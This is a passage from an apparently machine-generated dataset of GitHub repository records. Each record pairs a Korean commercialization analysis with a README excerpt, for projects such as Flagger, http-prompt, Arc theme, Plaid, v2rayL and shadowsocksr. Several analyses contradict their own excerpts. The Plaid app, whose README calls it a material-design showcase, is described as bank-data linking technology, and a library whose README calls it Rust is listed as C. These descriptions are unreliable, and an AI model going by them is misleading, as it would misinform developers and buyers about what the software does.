Flagger 저장소 분석\n\n## 왜 보물인가\n온라인 서비스의 업데이트를 안전하게 배포하면서 문제가 생기면 자동으로 되돌릴 수 있는 기술로, 서비스 중단 없이 새 기능을 빠르게 출시할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 금융 앱이나 협업 도구에서 새 기능을 일부 사용자에게만 먼저 공개한 후 안정성을 확인하고 전체 배포\n","readme_excerpt":" # Flagger\n\n[![release](https://img.shields.io/github/release/fluxcd/flagger/all.svg)](https://github.com/fluxcd/flagger/releases)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/4783/badge)](https://bestpractices.coreinfrastructure.org/projects/4783)\n[![report](https://goreportcard.com/badge/github.com/fluxcd/flagger)](https://goreportcard.com/report/github.com/fluxcd/flagger)\n[![FOSSA Status](https://app.fossa.com/api/projects/custom%2B162%2Fgithub.com%2Ffluxcd%2Fflagger.svg?type=shield)](https://app.fossa.com/projects/custom%2B162%2Fgithub.com%2Ffluxcd%2Fflagger?ref=badge_shield)\n[![Artifact Hub](https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/flagger)](https://artifacthub.io/packages/search?repo=flagger)\n[![CLOMonitor](https://img.shields.io/endpoint?url=https://clomonitor.io/api/projects/cncf/flagger/badge)](https://clomonitor.io/projects/cncf/flagger)\n\nFlagger is a progressive delivery tool that automates the release proces","composite_score":0.4248,"license_safety_tag":"safe"},{"name":"eliangcs/http-prompt","github_url":"https://github.com/eliangcs/http-prompt","stars":5,"language":"Python","license":"mit","abandonment_months":24,"description":"# http-prompt 분석 보고서\n\n## 왜 보물인가\n복잡한 웹 API 테스트를 마치 대화하듯 간단하게 할 수 있는 도구로, 개발자들의 반복적인 작업 시간을 크게 단축시킵니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: API 테스트 플랫폼으로 제공하여, 개발팀이 구독료를 내고 복잡한 웹 통신을 쉽게 검증하는 서비스\n2. **내부 업무 ","readme_excerpt":"HTTP Prompt\n===========\n\n|PyPI| |Docs| |Build| |Coverage| |Discord|\n\nHTTP Prompt is an interactive command-line HTTP client featuring autocomplete\nand syntax highlighting, built on HTTPie_ and prompt_toolkit_.\n\n|Asciinema|\n\n\nLinks\n-----\n\n* Home: https://http-prompt.com\n* Documentation: https://docs.http-prompt.com\n* Code: https://github.com/httpie/http-prompt\n* Chat: https://httpie.io/chat\n\n\n.. |PyPI| image:: https://img.shields.io/pypi/v/http-prompt.svg\n    :target: https://pypi.python.org/pypi/http-prompt\n\n.. |Docs| image:: https://img.shields.io/badge/docs-latest-brightgreen.svg?style=flat\n    :target: http://docs.http-prompt.com/en/latest/?badge=latest\n\n.. |Build| image:: https://github.com/httpie/http-prompt/workflows/Build/badge.svg\n    :target: https://github.com/httpie/http-prompt/actions\n\n.. |Coverage| image:: https://coveralls.io/repos/github/eliangcs/http-prompt/badge.svg?branch=master\n    :target: https://coveralls.io/github/eliangcs/http-prompt?branch=master\n\n.. |Discord| ","composite_score":0.4245,"license_safety_tag":"safe"},{"name":"horst3180/arc-theme","github_url":"https://github.com/horst3180/arc-theme","stars":5,"language":"CSS","license":"GPL-3.0","abandonment_months":64,"description":"# Arc Theme 프로젝트 분석\n\n## 왜 보물인가\n리눅스 데스크톱 환경을 아름답고 현대적으로 꾸밀 수 있는 무료 디자인 테마로, 컴퓨터를 더 예쁘게 만들고 싶은 사용자들이 선호하는 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 리눅스 사용자 커뮤니티를 위한 테마 마켓플레이스 구축 및 프리미엄 테마 판매 플랫폼\n2. **내부 업무","readme_excerpt":"# Arc Theme\n\nArc is a flat theme with transparent elements for GTK 3, GTK 2 and GNOME Shell which supports GTK 3 and GTK 2 based desktop environments like GNOME, Unity, Budgie, Pantheon, Xfce, MATE, etc.\n\n## Arc is available in three variants \n\n##### Arc\n\n![A screenshot of the Arc theme](http://i.imgur.com/Ph5ObOa.png)\n\n##### Arc-Darker\n\n![A screenshot of the Arc-Darker theme](http://i.imgur.com/NC6dqyl.png)\n\n##### Arc-Dark\n\n![A screenshot of the Arc-Dark theme](http://i.imgur.com/5AGlCnA.png)\n\n## Installation\n\n### Packages\n\n|Distro|Package Name/Link|\n|:----:|:----:|\n| Arch Linux | `arc-gtk-theme`, [`gtk-theme-arc-git`](https://aur.archlinux.org/packages/gtk-theme-arc-git) (AUR) |\n| Debian 8 | [OBS Repo][obs-repo] |\n| Debian Testing/Unstable | `arc-theme` |\n| Fedora 21 - 23 | [OBS Repo][obs-repo] |\n| Fedora 24 -25 | `arc-theme` |\n| Gentoo/Funtoo | `x11-themes/arc-theme` from the [Scriptkitties Overlay][sk-overlay] |\n| openSUSE | [OBS Repo][obs-repo] |\n| Solus | `arc-gtk-theme` |\n| Ubun","composite_score":0.4242,"license_safety_tag":"restricted"},{"name":"nickbutcher/plaid","github_url":"https://github.com/nickbutcher/plaid","stars":6,"language":"Kotlin","license":"apache-2.0","abandonment_months":29,"description":"# Plaid 저장소 분석\n\n## 왜 보물인가\n금융 데이터를 안전하게 연결해주는 기술로, 은행 정보와 앱을 자동으로 연동할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **가계부 앱 개발**: 사용자가 은행 계좌를 직접 연동하면 자동으로 거래 내역이 기록되는 서비스\n2. **대출 심사 자동화 시스템**: 금융회사가 고객의 실제 은행 잔액과 소득을","readme_excerpt":"# \\[ 🚧 Work in progress 👷‍♀️⛏👷🔧️👷🔧 🚧 \\] Plaid 2.0 \n\nRewriting Plaid using [Android Architecture Components](https://developer.android.com/topic/libraries/architecture/), in Kotlin. \n\n👀 \"[Up for grabs](https://github.com/nickbutcher/plaid/issues?q=is%3Aissue+is%3Aopen+label%3A%22Up+for+grabs+%F0%9F%A4%9A%22)\" issues – We're happy to [get your contributions](https://github.com/nickbutcher/plaid/blob/master/CONTRIBUTING.md#contributing-a-patch) on those!\n\n👍 Comments and new issues created are welcomed.\n\n🛑 We're currently not accepting external PRs that touch on the app's architecture.\n\n[![CircleCI](https://circleci.com/gh/android/plaid/tree/master.svg?style=shield)](https://circleci.com/gh/android/plaid/tree/master)\n\n### Background\n\nPlaid was written with one big goal: showcase material design in Android in a real application. While Plaid successfully achieved its goal, from an architecture point of view, it lacks all features that would make it a modular, scalable, testable and maintaina","composite_score":0.424,"license_safety_tag":"safe"},{"name":"Novartis/tidymodules","github_url":"https://github.com/Novartis/tidymodules","stars":5,"language":"R","license":"NOASSERTION","abandonment_months":21,"description":"# Novartis/tidymodules 가치 분석\n\n## 왜 보물인가\n제약 대기업 노바르티스가 공개한 이 도구는 복잡한 데이터 분석 작업을 깔끔하게 정리하는 방법론으로, 제약·생명공학 분야에서 신뢰성 높은 결과를 빠르게 얻을 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 제약사 내부 데이터 분석 플랫폼 (SaaS)**\n- 임상시험 데이터를 체계","readme_excerpt":"<!-- README.md is generated from README.Rmd. Please edit that file -->\n\n# tidymodules <img src=\"man/figures/logo.svg\" style=\"float:right; height:139px;\" />\n\n[![build\nstatus](https://github.com/Novartis/tidymodules/actions/workflows/pkgdown.yaml/badge.svg)](https://github.com/Novartis/tidymodules/actions)\n[![lifecycle](https://img.shields.io/badge/lifecycle-experimental-orange.svg)](https://www.tidyverse.org/lifecycle/#experimental)\n\nThe `{tidymodules}` R package is built on top of shiny module using\n`{R6}` to provide a new object-oriented programming (OOP) approach for\nmodule development, new module interface using input/output ports and a\nset of tidy operators for handling cross-module communication.\n\nThe main features of tidymodules and its comparison with conventional\nShiny modules are presented in the table below.\n\n<table>\n<colgroup>\n<col style=\"width: 1%\" />\n<col style=\"width: 9%\" />\n<col style=\"width: 52%\" />\n<col style=\"width: 36%\" />\n</colgroup>\n<thead>\n<tr class=\"header\">\n<th>","composite_score":0.4239,"license_safety_tag":"unknown"},{"name":"jiangxufeng/v2rayL","github_url":"https://github.com/jiangxufeng/v2rayL","stars":5,"language":"Python","license":"GPL-3.0","abandonment_months":40,"description":"# v2rayL 저장소 분석\n\n## 왜 보물인가\n인터넷 접근성이 제한된 지역의 사용자들이 자유롭게 온라인에 접속할 수 있도록 돕는 네트워크 우회 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독 기반 VPN/프록시 서비스로 개인 사용자에게 판매\n2. **내부 업무 도구**: 기업의 해외 지사 직원들이 본사 내부 시스템에 안전하게","readme_excerpt":"# remark\n**工作繁忙无法维护，工作繁忙无法维护，工作繁忙无法维护**\n\n# v2ray\nV2Ray 是 Project V 下的一个工具。Project V 包含一系列工具，帮助你打造专属的定制网络体系。而 V2Ray 属于最核心的一个。 简单地说，V2Ray 是一个与 Shadowsocks 类似的代理软件，但比Shadowsocks更具优势\n\nV2Ray 用户手册：https://www.v2ray.com\n\nV2Ray 项目地址：https://github.com/v2ray/v2ray-core\n\n# v2rayL\n\n![v2rayL](http://cloud.thinker.ink/images/857633d396d9f89cc606c0666194f45f.png)\n\nv2ray linux 客户端，使用pyqt5编写GUI界面，核心基于v2ray-core(v2ray-linux-64)\n\n开发环境：`ubuntu18.04+Python3.6`\n\n目前已实现以下功能：\n\n- 全新的UI界面\n- 添加订阅地址，自动解析并展示可连接VPN\n- 设置自动更新订阅、更换地址\n- 支持协议：vmess、shadowsocks\n- 通过`vmess://`、`ss://`分享链接添加配置，通过二维码添加配置\n- 手动添加配置，修改本地监听端口\n- 导出配置、生成配置分享链接、生成分享二维码\n- 最小化至托盘、测试延时、检查更新\n- 透明代理(Beta)\n- ......\n\n其中vmess支持websocket、mKcp、tcp\n目前程序可能存在一些bug但是没有测试出，若在使用过程中发现bug，请在issue中提交，以便改进。\n\n**透明代理说明：**\n\n透明代理设置参考v2ray教程：[透明代理(TPROXY)](https://guide.v2fly.org/app/tproxy.html)\n\n测试环境： 三台不同的机器(条件有限)\n\n测试时出现问题： 有些透明代理无法生效，导致代理失败。\n\n解决办法：在测试时发现多尝试启动几次(关闭，开启)或重启程序就可以正常使用\n\n后续会进一步深入优化这个问题，透明代理无法使用时可以关闭，不影响其正常使用\n# 使用\n\n## 使用前请注意\n\n**所有命令请直接运行，避免导致出现权限问题**\n\n**所有命令请","composite_score":0.4238,"license_safety_tag":"restricted"},{"name":"yangchaojiang/yjPlay","github_url":"https://github.com/yangchaojiang/yjPlay","stars":8,"language":"C","license":"apache-2.0","abandonment_months":70,"description":"# yjPlay 저장소 분석\n\n## 왜 보물인가\n동영상 재생 기능을 만드는 기초 코드 모음으로, 이를 활용하면 유튜브나 넷플릭스 같은 영상 서비스를 더 쉽게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 교육용 영상 플랫폼에서 동영상 재생 기능 제공\n- **내부 업무 도구**: 회사 내 화상 회의나 교육 자료 공유 시스템 ","readme_excerpt":"# yjPlay\n\n[![Download](https://api.bintray.com/packages/ycjiang/ycjiang/VideoPlayModule/images/download.svg) ](https://bintray.com/ycjiang/ycjiang/VideoPlayModule/_latestVersion)\n\n\n  ### gif 显示有点卡，帧数低，实际很流畅\n  #### [下载预览apk](https://raw.githubusercontent.com/yangchaojiang/yjPlay/master/app-release.apk)\n\n ![](https://github.com/yangchaojiang/ResProject/blob/master/gif/test.gif)  ![](https://github.com/yangchaojiang/ResProject/blob/master/gif/test2.gif)\n \n ![](https://github.com/yangchaojiang/ResProject/blob/master/gif/test3.gif)\n ![](https://github.com/yangchaojiang/ResProject/blob/master/gif/test4.gif)\n\n  ![](https://github.com/yangchaojiang/ResProject/blob/master/gif/testtv.gif)\n ### 基于exoPlayer 自定义播放器 JPlayer支持功能：\n   *  ExoUserPlayer 基本播放（默认关闭手势  亮度，音量，快进，等手势，支持自定义布局）\n   *  自动适配适配TV。\n   *  支持横屏和竖屏两种模式全屏。\n   *  适配音频控制布局。\n   *  支持广告视频预览(轻松实现，完美切换，<font color=\"red\">可自定义</font>)。\n   *  支持多种分辨率视频切换（已支持自定义布局样式）。\n   *  [缓存下载加密视频功能（边播变缓存轻松实现](README_EN_VIDEO.md)<font color=\"red\">不是使用AndroidVi","composite_score":0.4237,"license_safety_tag":"safe"},{"name":"dhg/Skeleton","github_url":"https://github.com/dhg/Skeleton","stars":7,"language":"CSS","license":"mit","abandonment_months":31,"description":"# dhg/Skeleton 상용화 분석\n\n## 왜 보물인가\n웹사이트나 애플리케이션을 빠르게 만들 수 있는 기본 틀(뼈대)을 제공하여 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 새로운 웹 서비스를 빠르게 출시할 때 기본 구조로 활용\n2. **내부 업무 도구**: 회사의 관리자 시스템이나 데이터 ","readme_excerpt":"# [Skeleton](http://getskeleton.com)\nSkeleton is a simple, responsive boilerplate to kickstart any responsive project.\n\nCheck out <http://getskeleton.com> for documentation and details.\n\n## Getting started\n\nThere are a couple ways to download Skeleton:\n- [Download the zip](https://github.com/dhg/Skeleton/releases/download/2.0.4/Skeleton-2.0.4.zip)\n- Clone the repo: `git clone https://github.com/dhg/Skeleton.git` (Note: this is under active development, so if you're looking for stable and safe, use the zipped download)\n\n\n### What's in the download?\n\nThe download includes Skeleton's CSS, Normalize CSS as a reset, a sample favicon, and an index.html as a starting point.\n\n```\nSkeleton/\n├── index.html\n├── css/\n│   ├── normalize.min.css\n│   └── skeleton.css\n└── images/\n    └── favicon.ico\n\n```\n\n### Why it's awesome\n\nSkeleton is lightweight and simple. It styles only raw HTML elements (with a few exceptions) and provides a responsive grid. Nothing more.\n- Around 400 lines of CSS unminified an","composite_score":0.4235,"license_safety_tag":"safe"},{"name":"hdodenhof/CircleImageView","github_url":"https://github.com/hdodenhof/CircleImageView","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":25,"description":"# CircleImageView 사업화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 사용자 프로필 사진을 깔끔한 동그란 모양으로 표시하는 기술로, 수천 개의 앱에서 필요로 하는 기본 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS**: 팀 협업 도구(Slack, Notion 경쟁사)에서 사용자 아바타를 동그란 형태로 표시하는 기능 제공\n2. **내부 ","readme_excerpt":"CircleImageView\n===============\n\nA fast circular ImageView perfect for profile images. This is based on [RoundedImageView from Vince Mi](https://github.com/vinc3m1/RoundedImageView) which itself is based on techniques recommended by [Romain Guy](https://twitter.com/romainguy).\n\n![CircleImageView](https://raw.github.com/hdodenhof/CircleImageView/master/screenshot.png)\n\nIt uses a BitmapShader and **does not**:\n* create a copy of the original bitmap\n* use a clipPath (which is neither hardware accelerated nor anti-aliased)\n* use setXfermode to clip the bitmap (which means drawing twice to the canvas)\n\nAs this is just a custom ImageView and not a custom Drawable or a combination of both, it can be used with all kinds of drawables, i.e. a PicassoDrawable from [Picasso](https://github.com/square/picasso) or other non-standard drawables (needs some testing though).\n\nGradle\n------\n```\ndependencies {\n    ...\n    implementation 'de.hdodenhof:circleimageview:3.1.0'\n}\n```\n\nUsage\n-----\n```xml\n<de.hd","composite_score":0.4234,"license_safety_tag":"safe"},{"name":"sansquoi/PlushCV","github_url":"https://github.com/sansquoi/PlushCV","stars":5,"language":"TeX","license":"Apache-2.0","abandonment_months":21,"description":"# PlushCV 상업화 분석\n\n## 왜 보물인가\n이력서를 자동으로 예쁘게 만들어주는 도구로, 취업 준비생들이 시간을 절약하면서 전문적인 인상을 남길 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독 형태로 \"5분 안에 전문가급 이력서 생성\" 웹사이트 운영\n2. **내부 업무 도구**: 대기업 인사팀이 채용 시 지원자들의 이력","readme_excerpt":"PlushCV\n=========================\n\nNote: A new ATS-friendly template has been published at [**AustereCV**](https://github.com/cystema/AustereCV).\n\nA **one-page**, **two asymmetric column** resume template in **XeTeX** that caters particularly to  Computer Science students.\nHas a bunch of font options as listed in Preview. Inspired by [**deedy-resume**](https://github.com/deedy/Deedy-Resume). \n\nEasiest way to create your own is to use the [Overleaf template](https://www.overleaf.com/latex/templates/plushcv/jybpnsftmdkf) to edit and compile. \n\nAll fonts used are free and open source.\n\n## Dependencies\n\n1. Compiles only with **XeTeX** and required **BibTex** for compiling publications and the .bib filetype.\n\n## Availability\n\n1. Direct download.\n2. [**Overleaf**.com template](https://www.overleaf.com/latex/templates/plushcv/jybpnsftmdkf)\n\n## Preview\n\n**Source Sans Pro**\n\n![alt tag](https://github.com/cystema/PlushCV/blob/main/previews/preview_sourcesanspro.png)\n\n## Changelog\n\n### v1.1\n\n  1.","composite_score":0.4234,"license_safety_tag":"safe"},{"name":"afollestad/material-dialogs","github_url":"https://github.com/afollestad/material-dialogs","stars":5,"language":"Kotlin","license":"apache-2.0","abandonment_months":40,"description":"# Material-Dialogs 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱에서 사용자에게 질문하거나 선택지를 보여주는 팝업창(대화상자)을 쉽게 만들 수 있는 도구로, 5년 이상 검증된 안정적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 모바일 앱 개발 플랫폼 (SaaS)**\n앱 개발자들이 구독료를 내고 이 기술을 클라우드에서 직접 사용하고, 자","readme_excerpt":"# Material Dialogs\n\n#### [View Releases and Changelogs](https://github.com/afollestad/material-dialogs/releases)\n\n[![Android CI](https://github.com/afollestad/material-dialogs/workflows/Android%20CI/badge.svg)](https://github.com/afollestad/material-dialogs/actions?query=workflow%3A%22Android+CI%22)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/0a4acc30a9ce440087f7688735359bb8)](https://www.codacy.com/app/drummeraidan_50/material-dialogs?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=afollestad/material-dialogs&amp;utm_campaign=Badge_Grade)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n\n---\n\n![Showcase](https://raw.githubusercontent.com/afollestad/material-dialogs/main/art/showcase4.png)\n\n# Modules\n\nThe core module is the fundamental module that you need in order to use this library. The others \nare extensions to core.\n\nPlease note that since Material Dialogs 2.x.x, this library only sup","composite_score":0.4234,"license_safety_tag":"safe"},{"name":"KZen-networks/class","github_url":"https://github.com/KZen-networks/class","stars":5,"language":"C","license":"GPL-3.0","abandonment_months":40,"description":"# KZen-networks/class 분석 보고서\n\n## 왜 보물인가\n암호화 관련 수학 계산을 안전하게 처리하는 기술로, 금융이나 보안이 중요한 서비스에서 신뢰할 수 있는 기반을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **암호화폐 거래소 API**: 사용자 자산을 안전하게 관리하는 백엔드 시스템으로 제공\n2. **은행 앱 내부 도구**: 금융 거래","readme_excerpt":"# Class\nRust library for building IQC: cryptography based on class groups (Cl) of imaginary quadratic orders. \n\nBackground\n-------------------\nCls are easy to generate. Their most interesting and useful property is that finding the group order is considered hard. In recent years we see more and more cryptographic primitives instantiated using Cls. We recommend [6,7,8] to learn more about Cls in practice.\n\n\nGroup Element Representation\n-------------------\nGroup Element can be represented as (a,b,c) or (a,b,Δ) triple (correspond to BinaryQF and ABDeltaTriple structures\nrespectively). We also support compression from the [paper][compression] (see BinaryQFCompressed structure).\n\n[compression]: https://eprint.iacr.org/2020/196.pdf\n\nPrimitives\n-------------------\nContributions for implementing new primitives or improving existing ones are welcome. See open issues first. Existing primitives can be found in the _primitives_ folder : \n\n1) **PoE**: Proof of exponantiation: The prover can efficie","composite_score":0.4229,"license_safety_tag":"restricted"},{"name":"SuperMonster003/Auto.js_Projects","github_url":"https://github.com/SuperMonster003/Auto.js_Projects","stars":13,"language":"JavaScript","license":"GPL-3.0","abandonment_months":41,"description":"# Auto.js_Projects 상품화 분석\n\n## 왜 보물인가\n스마트폰에서 반복적인 작업을 자동으로 처리해주는 프로그램으로, 매일 하는 일정한 업무를 손으로 하지 않아도 되게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **소상공인용 SaaS**: 카페/편의점 주인이 매일 하는 재고 확인, 주문 관리를 자동화하는 월 구독 서비스\n2. **기업 업","readme_excerpt":"<!--suppress HtmlDeprecatedAttribute -->\n\n<div align=\"center\">\n  <p>\n    <img alt=\"AF_Banner\" src=\"https://raw.githubusercontent.com/SuperMonster002/Hello-Sockpuppet/master/ant-forest-banner_374%C3%97106.png\"/>\n  </p>\n\n  <p>基于 Auto.js 的蚂蚁森林能量自动收取脚本</p>\n  <p>Auto.js-based ant forest energy auto-collect script</p>\n\n  <p>\n    <a href=\"https://github.com/SuperMonster003/Ant-Forest/releases/latest\"><img alt=\"GitHub release (latest by date)\" src=\"https://img.shields.io/github/v/release/SuperMonster003/Ant-Forest\"/></a>\n    <a href=\"https://github.com/SuperMonster003/Ant-Forest/issues\"><img alt=\"GitHub closed issues\" src=\"https://img.shields.io/github/issues/SuperMonster003/Ant-Forest?color=009688\"/></a>\n    <a href=\"https://github.com/SuperMonster003/AutoJs6\"><img alt=\"GitHub AutoJs6 repository\" src=\"https://img.shields.io/badge/auto.js->= 6.2.0-67a91b\"/></a>\n    <a href=\"https://github.com/topics/javascript\"><img alt=\"GitHub top language\" src=\"https://img.shields.io/github/languages/top/Sup","composite_score":0.4229,"license_safety_tag":"restricted"},{"name":"gcgarner/IOTstack","github_url":"https://github.com/gcgarner/IOTstack","stars":5,"language":"Shell","license":"GPL-3.0","abandonment_months":25,"description":"# IOTstack 상용화 분석\n\n## 왜 보물인가\n집에 있는 각종 기계들(CCTV, 센서, 스마트 기기)을 한 곳에서 쉽게 관리할 수 있는 시스템으로, 복잡한 설정 없이도 누구나 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 스마트홈 관리 SaaS 서비스**\n집의 모든 IoT 기기를 스마트폰으로 통제하고 모니터링하는 월 구독 서비스로 제공 가","readme_excerpt":"# IOTStack\n\nThis project has been migrated. Please find the maintained version at: https://github.com/SensorsIot/IOTstack\n\n## Announcements !! Migrated !!\n\nThis project has been migrated. Please find the maintained version at: https://github.com/SensorsIot/IOTstack\n\nTo migrate your current IOTstack version, you can run:\n\n```\n$ cd ~/IOTstack\n$ git remote set-url origin https://github.com/SensorsIot/IOTstack.git\n$ git fetch origin master\n$ git reset --hard origin/master\n$ docker-compose down\n$ ./menu.sh\n$ docker-compose up -d\n```\n\nThis will override any changes you've made locally on files git tracks.\n\nIf you have questions about migrating your current stack, or why the migration occured, please ask on the Discord:\nhttps://discord.gg/ZpKHnks\n\nAny PRs created, or issues raised on this repo may not be answered.\n\n***\n\n***\n\n## Old Readme:\n\nIOTstack is a builder for docker-compose to easily make and maintain IoT stacks on the Raspberry Pi\n\nThe bulk of the README has moved to the Wiki. Please ","composite_score":0.4229,"license_safety_tag":"restricted"},{"name":"fossasia/loklak_search","github_url":"https://github.com/fossasia/loklak_search","stars":7,"language":"TypeScript","license":"LGPL-3.0","abandonment_months":39,"description":"# fossasia/loklak_search 상용화 분석\n\n## 왜 보물인가\nSNS와 뉴스에서 필요한 정보를 빠르게 찾아주는 검색 엔진으로, 여러 출처의 데이터를 한 곳에서 통합 검색할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 마케팅 분석 SaaS**\n소상공인이 자신의 브랜드가 SNS에서 어떻게 언급되는지 모니터링하는 월간 구독 서비스로 제공할 ","readme_excerpt":"# loklak_search\n\n[![Join the chat at https://gitter.im/loklak/loklak](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/loklak/loklak)\n[![Code Climate](https://codeclimate.com/github/fossasia/loklak_search/badges/gpa.svg)](https://codeclimate.com/github/fossasia/loklak_search)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/cf7beeb59bce451f9e02958f301554d8)](https://www.codacy.com/app/fossasia/loklak_search?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=fossasia/loklak_search&amp;utm_campaign=Badge_Grade)\n[![codecov](https://codecov.io/gh/fossasia/loklak_search/branch/master/graph/badge.svg)](https://codecov.io/gh/fossasia/loklak_search)\n[![Percentage of issues still open](http://isitmaintained.com/badge/open/fossasia/loklak_search.svg)](http://isitmaintained.com/project/fossasia/loklak_search \"Percentage of issues still open\")\n[![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/fossasia/loklak_search.svg)](http://isitma","composite_score":0.4229,"license_safety_tag":"restricted"},{"name":"solana-dev-adv/solana-cookbook","github_url":"https://github.com/solana-dev-adv/solana-cookbook","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":20,"description":"# Solana Cookbook 상업화 분석\n\n## 왜 보물인가\n블록체인 초보자도 따라 할 수 있는 **솔라나 암호화폐 개발 가이드**로, 진입장벽이 높은 블록체인 개발을 대중화할 수 있는 교육 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독형 블록체인 개발 온라인 학습 플랫폼 (영상 강의, 실시간 질의응답, 커뮤니티 포함)\n","readme_excerpt":"# Solana Cookbook\n\nThe Solana Cookbook is meant to house small digestible code snippets\nfor someone that has no experience with blockchain or Solana to be able\nto grab and go.\n\n## Contributing\n\nThe Cookbook is welcome to any and all contributions. Please refer to\nthe project's style when contributing new snippets of code.\n\n### Structure\n\nCurrently we have \"topics\" under `/docs` and the code for those topics\nlives under `/code/<topic>`.\n\n### References\n\nReferences are an overarching topic with a list of references of how to do\nthings under that topic. The general structure is the following:\n\n```\nCode Reference Title\n\nShort Summary\n\nCode Snippet\n```\n\n### Guides\n\nGuides are longer form informational documentation on various topics.\nThe general structure for writing a guide is the following:\n\n```\nBrief Summary/TLDR\n\nFact Sheet\n\nDeep Dive\n\nOther Resources\n```\n\n### Building\n\nWe recommend building and running the documentation in a development container\n(requires Docker to be installed).\nA `D","composite_score":0.4228,"license_safety_tag":"unknown"},{"name":"shadowsocksr-backup/shadowsocksr","github_url":"https://github.com/shadowsocksr-backup/shadowsocksr","stars":7,"language":"Python","license":"apache-2.0","abandonment_months":57,"description":"# ShadowSocksR 백업 저장소 분석\n\n## 왜 보물인가\n인터넷 접속 제한이 있는 지역에서 자유롭게 온라인에 접속할 수 있게 해주는 기술로, 프라이버시 보호가 필요한 사용자들 사이에서 지속적인 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **VPN/프록시 서비스 제공**: 개인 사용자에게 월 구독 방식으로 안전한 인터넷 접속 서비스 판매\n2.","readme_excerpt":"shadowsocks\n===========\n\n[![PyPI version]][PyPI]\n[![Build Status]][Travis CI]\n[![Coverage Status]][Coverage]\n\nA fast tunnel proxy that helps you bypass firewalls.\n\nServer\n------\n\n### Install\n\nDebian / Ubuntu:\n\n    apt-get install python-pip\n    pip install shadowsocks\n\nCentOS:\n\n    yum install python-setuptools && easy_install pip\n    pip install shadowsocks\n\nWindows:\n\nSee [Install Server on Windows]\n\n### Usage\n\n    ssserver -p 443 -k password -m aes-256-cfb\n\nTo run in the background:\n\n    sudo ssserver -p 443 -k password -m aes-256-cfb --user nobody -d start\n\nTo stop:\n\n    sudo ssserver -d stop\n\nTo check the log:\n\n    sudo less /var/log/shadowsocks.log\n\nCheck all the options via `-h`. You can also use a [Configuration] file\ninstead.\n\nClient\n------\n\n* [Windows] / [OS X]\n* [Android] / [iOS]\n* [OpenWRT]\n\nUse GUI clients on your local PC/phones. Check the README of your client\nfor more information.\n\nDocumentation\n-------------\n\nYou can find all the documentation in the [Wiki].\n\nLicense\n--","composite_score":0.4226,"license_safety_tag":"safe"},{"name":"sendya/ant-design-pro-vue","github_url":"https://github.com/sendya/ant-design-pro-vue","stars":5,"language":"Vue","license":"MIT","abandonment_months":8,"description":"# ant-design-pro-vue 상용화 분석\n\n## 왜 보물인가\n기업용 관리 시스템을 빠르게 만들 수 있는 완성된 기본 틀을 제공하므로, 개발 비용과 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업 회계·인사 관리 클라우드 서비스로 월구독 모델 운영\n- **내부 업무 도구**: 대기업의 직원 데이터 관","readme_excerpt":"English | [简体中文](./README.zh-CN.md)\n\n<h1 align=\"center\">Ant Design Vue Pro for Vue 2</h1>\n<div align=\"center\">\nAn out-of-box UI solution for enterprise applications as a Vue boilerplate. based on  <a href=\"https://vuecomponent.github.io/ant-design-vue/docs/vue/introduce-cn/\" target=\"_blank\">Ant Design of Vue</a>\n</div>\n\n<div align=\"center\">\n  If you are looking for the Vue 3 version, please visit [Ant Design Vue Pro for Vue 3](https://store.antdv.com/items/admin-pro)\n</div>\n\n<div align=\"center\">\n\n[![License](https://img.shields.io/npm/l/package.json.svg?style=flat)](https://github.com/vueComponent/ant-design-vue-pro/blob/master/LICENSE)\n[![Release](https://img.shields.io/github/release/vueComponent/ant-design-vue-pro.svg?style=flat)](https://github.com/vueComponent/ant-design-vue-pro/releases/latest)\n[![Support Vue Version](https://img.shields.io/badge/Support-Vue2-green?style=flat)](https://github.com/vueComponent/ant-design-vue-pro/releases/latest)\n[![Travis branch](https://travis-ci","composite_score":0.4226,"license_safety_tag":"safe"},{"name":"unity3d-jp/UnityChanToonShaderVer2_Project","github_url":"https://github.com/unity3d-jp/UnityChanToonShaderVer2_Project","stars":5,"language":"ShaderLab","license":"unknown","abandonment_months":20,"description":"# Unity Chan Toon Shader Ver2 분석\n\n## 왜 보물인가\n3D 게임에서 애니메이션처럼 보이는 그래픽 효과를 만드는 핵심 도구로, 인디 게임 개발자부터 대형 스튜디오까지 널리 필요로 하는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 SaaS**: 웹 기반 게임 제작 플랫폼에 내장하여 사용자가 쉽게 애니메이션 스타일의 게임을","readme_excerpt":"﻿# 【Unity-Chan Toon Shader 2.0 (UTS2) Ver.2.0.9】\n---\n<img width = \"800\" 